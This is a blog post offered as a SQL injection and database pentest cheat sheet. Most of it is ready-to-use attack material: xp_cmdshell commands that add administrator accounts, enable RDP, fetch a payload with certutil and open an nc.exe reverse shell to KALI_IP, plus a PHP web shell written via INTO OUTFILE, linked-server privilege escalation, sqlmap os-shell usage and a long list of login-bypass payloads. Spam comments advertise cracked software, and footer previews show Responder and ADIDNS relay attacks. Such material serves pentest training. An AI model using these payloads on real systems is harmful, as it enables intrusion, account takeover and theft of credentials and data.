Skip to main content

SQL DB & SQL Injection Pentest Cheat Sheet


1) MSSQL Injection Cheat Sheet | pentestmonkey

2) xp_cmdshell | Red Team tales

3) PentesterMonkey SQL Injection Cheatsheet

Use dbeaver for GUI Access

4) SQL Injection Explanation | Graceful Security

Common Ports

Microsoft SQL:
1433/TCP (default listener)
1434/UDP (browser service)
4022/TCP (service broker)
5022/TCP (AlwaysOn High Availability default)
135/TCP (Transaction SQL Debugger)
2383/TCP (Analysis Services)
2382/TCP (SQL Server Browser Service)
500,4500/UDP (IPSec)
137-138/UDP (NetBios / CIFS)
139/TCP (NetBios CIFS)
445/TCP (CIFS)

Oracle SQL:
1521/TCP
1630/TCP
3938/HTTP

MongoDB:
27017,27018,27019/TCP


PostgreSQL:
8432/TCP

MySQL:
3306/TCP
SQL DB Enum with nmap:

nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS

nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"

nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators bhanu /add" 

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
nmap --script mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p3306 -sV 10.10.10.10
MSSQL/MYSQL DB Login Bruteforce
git clone https://github.com/m8r0wn/enumdb.git cd enumdb python3 setup.py install Download Wordlist from Seclists cat mssql-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt cat mssql-betterdefaultpasslist.txt | cut -f2 -d":" > pass.txt #Port is optional #-t = mysql or mssql; mssql port 1433/1434; mysql port - 3309 # -U = users.txt, -u = username; -P = passwords.txt, -p = password enumdb -U user.txt -P pass.txt -t mssql --brute 10.10.10.10 -port 1434 -v
SQSH usage:

sqsh -S IP_Address:PORT -u username -p password
EXEC xp_cmdshell 'net users /add bhanu bhanu123'

\go

EXEC xp_cmdshell 'net localgroup administrators bhanu /add'

\go

MssqlClient


Exploiting From Windows with Explanation - Nikhil Mittal

#Enumeration using Metasploit
auxiliary(admin/mssql/mssql_enum)

mssqlclient.py username@10.10.10.10

#Run arbitary commands
xp_cmdshell whoami

#View Version
SELECT @@version

#List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME();


#List Users

SELECT name FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';

#Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

#Enum Privs

SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

#Show Servername
select @@servername

#Show linked servers
select * from sysservers;   
select name from sysservers;

#Enum Linked Remote Servers
EXECUTE ('select @@servername;') at [hostname\DB_NAME];
EXECUTE ('select suser_name();') at
[hostname\DB_NAME];
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME];
#Find the username from which we can run commands on the server
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];

#Check sysadmin accounts on the server/DB

EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];

#Check your permissions on the server
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];

#Running command as a linked server using the server that we have permissions on

EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

#View the permissions you have on the linked database.

EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

#Creating a new sa user
#so that we can work easily on the DB that we have permissions on, rather than running as other user multile times
EXECUTE('EXECUTE(''CREATE LOGIN newuser WITH PASSWORD = ''''P@$$w0rd123'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''newuser'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

#Login as a new user mssqlclient.py newuser@10.10.10.10
P@$$w0rd123

#List Databases
SELECT name FROM master..sysdatabases;

#List Objects from a selected database
to QUERY in MSSQL - [server].[db].[schema].[table]

select table_name,table_schema from DB_NAME.INFORMATION_SCHEMA.TABLES;

#Exploiting a Stored Procedure - sp_execute_external_script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';

#Abusing Xpdirtree

Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local SQLCMD -S SERVER\Username -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
ERROR BASED SQL Injection:
============================
website.com/comment.php?id=1'   /Breaks the statement
website.com/comment.php?id=738 order by 1 /Order by first column with reference to select query
website.com/comment.php?id=738 order by 7 /increase the column count, until we get an error
      /This statement broke at 7, so only 6 columns
website.com/comment.php?id=738 union select 1,2,3,4,5,6
  /union all is used to combine 2 or more select statements
  /Where ever output is displayed - it is suitable to enumerate, here 5

website.com/comment.php?id=738 union select 1,2,3,4,@@version,6  /mysql version command

website.com/comment.php?id=738 union select 1,2,3,4,user(),6  /Current user

website.com/comment.php?id=738 union select 1,2,3,4,table_name,6 FROM information_schema.tables
     /Prints all of the table names in the database

website.com/comment.php?id=738 union select 1,2,3,4,column_name,6 FROM information_schema where table_name='users'
     /Extract column names from Table - Ue

website.com/comment.php?id=738 union select 1,2,name,4,password,6 FROM users



ERROR BASED SQL Injection: SQLLITE
==================================

http://localhost:3000/rest/products/search?q=')) union select 1,sqlite_version(),3,4,5,6,7,8,9--;

http://localhost:3000/rest/products/search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,9 FROM sqlite_master--;

search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,tbl_name FROM sqlite_master--;           # Get all table names in sqlite_master db

search?q=sadsa')) union select 1,sqlite_version(),3,4,5,6,7,email,password FROM Users--;                 #Get usernames and passwords            
TIME BASED SQL INJECTION:
--------------------------
In Time  Based SQL injection - if the query is true - it will wait for the sleep time or else 
executed immediately.

website.com/comment.php?id=738-sleep(5)  /5 Seconds to load
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
    /Executes after 5 seconds -Because the statement is true

website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0) 
    /Executes Immediately - Statement is false


website.com/comment.php?id=738 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
    /Loading a file from the server

website.com/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec(#_GET['cmd']);?>",6 into OUTFILE 'C:/xampp/htdocs/backdoor.php'

website.com/backdoor.php/cmd?ipconfig
SQL Command Injection: MSSQL

bhanu';EXEC Master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\omg.txt';--

admin';EXEC xp_cmdshell 'certutil -urlcache -f http://IP_Address/shell.asp';--

admin';EXEC Master.dbo.xp_cmdshell 'c:\share\nc.exe KALI_IP 9002 -e cmd.exe

sqsh -S IP_ADDRESS:27900 -U sa -L user=sa -L password=password


If xp_cmdshell is disabled:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;



Creating an Admin Account with RDP Access:

aaa';EXEC Master.dbo.xp_cmdshell 'net user /add bhanu bhanu123';--

aaa';EXEC Master.dbo.xp_cmdshell 'net localgroup administrators bhanu /add';--

aaa';EXEC Master.dbo.xp_cmdshell 'reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0';--

aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remoteadmin enable';--

aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remotedesktop enable';--

aaa';EXEC Master.dbo.xp_cmdshell 'mstsc /console /v:IP_Address';---

NSE Script for XP_CMDSHELL

Bypassing Restriction Interfaces:
----------------------------------
Use Tamper Data Firefox plugin.  /Intercetps Posts requests

start tampter data --> input something inoto input field. or change the items in 
drop down.
SQLMAP:
---------

#Skip a parameter 
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 --skip Param_Name

#Test only specified parameter
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 --skip Param1,Param2

#Dump All DB dat
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --dump --threads=5 #Get a shell sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --os-shell sqlmap --help sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" List all the databases: sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --dbs Current User: sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --current-user Current DB: sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --current-db Tables: sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --tables -D owasp10 Columns: sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --columns -T accounts -D owasp10 Dump: sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" -T accounts -D owasp10 --dump OS Shell: sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --os-shell SQL Shell: sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --sql-shell current_user() user() database() select tablename from information_schema.table where table_schema = 'owasp10'  
Methodology 

1) Check for login pages - try all special characters

2) f12 --> run the page; check for any search functionality like search?q= or id=1?; something like that


 

Cheatsheet

admin' or 1=1; --
admin' OR 1=1 -- -
search?q='))--;
' or '1'='1
' or 1=1;--
' or 1=1;#
') or ('x'='x
' or like '%';--
' or 1=1 LIMIT 1;--

USERNAME: ' or 1/*
PASSWORD: */ =1 --

USERNAME: admin' or 'a'='a
PASSWORD '#

If the database is mysql, try to dump all login info to files?

Mysql '*'
'&'
'^'
'-'
' or true;--
' or 1;--

union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Comments

  1. I appreciate your cooperation. Right on target I appreciate your help.Thank you so much for sharing all this wonderful info with the how-to's!!!! It is so appreciated!!! You always have good humor in your posts/blogs. So much fun and easy to read!
    crack mac
    iZotope RX 9 Audio Editor Advanced Crack
    DBeaver Crack
    MadMapper Crack
    Tridef 3D Crack

    ReplyDelete
    Replies
    1. Sql Injection Cheat Sheet >>>>> Download Now

      >>>>> Download Full

      Sql Injection Cheat Sheet >>>>> Download LINK

      >>>>> Download Now

      Sql Injection Cheat Sheet >>>>> Download Full

      >>>>> Download LINK zo

      Delete
  2. Good thinking Prestigious work Good work/Good job Proper Grand Purrrfect Great Remarkable Great going Resounding results Honorable Respectable I appreciate your cooperation. Right on target I appreciate your help.Thank you so much for sharing all this wonderful info with the how-to's!!!! It is so appreciated!!! You always have good humor in your posts/blogs. So much fun and easy to read!
    Crack Mac Download
    VMware Workstation Pro Crack
    Paragon Hard Disk Manager Crack
    Reason Crack
    Tuxera NTFS Crack
    MadMapper Crack
    iZotope RX 9 Audio Editor Advanced Crack
    Aiseesoft 3D Converter Crack

    ReplyDelete
  3. After looking through a few blog articles on your website,we sincerely appreciate the way you blogged.We’ve added it to our list of bookmarked web pages and will be checking back in the nearfuture. Please also visit my website and tell us what you think.Great work with hard work you have done I appreciate your work thanks for sharing it.
    FxFactory Pro Crack
    DBeaver Crack
    CuteFTP Pro Crack
    iBeesoft Data Recovery Crack
    AmiBroker Crack

    ReplyDelete
  4. Full Movies Online Streaming and TV Shows Streaming for Free - Fast and Free with Excellent Support on a Variety of Devices - MyFlixer - Safe and Private Streaming

    ReplyDelete
  5. Sql Injection Cheat Sheet >>>>> Download Now

    >>>>> Download Full

    Sql Injection Cheat Sheet >>>>> Download LINK

    >>>>> Download Now

    Sql Injection Cheat Sheet >>>>> Download Full

    >>>>> Download LINK 6H

    ReplyDelete
  6. You Can Also Get Cracked Software For Windows & Mac Free Download
    https://tijacrack.com/fxfactory-pro-crack/

    ReplyDelete
  7. Thank you for sharing this usefull blog. We offer the best place to a Buy home gadgets online at the best price. From here you can Buy phone accessories, headphones, leviation lamp, Best Flame Humidifier Lamp, apple charger station, a 360° Rotation Face Tracking Selfie Stick, 4 IN 1 Apple Charger Station With LED Light Lamp, Enjoying Headphones, Flame Humidifier Lamp, Levitating Bonsai Pot and Levitation Lamp online.

    ReplyDelete

Post a Comment

Popular posts from this blog

Relay Attacks

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm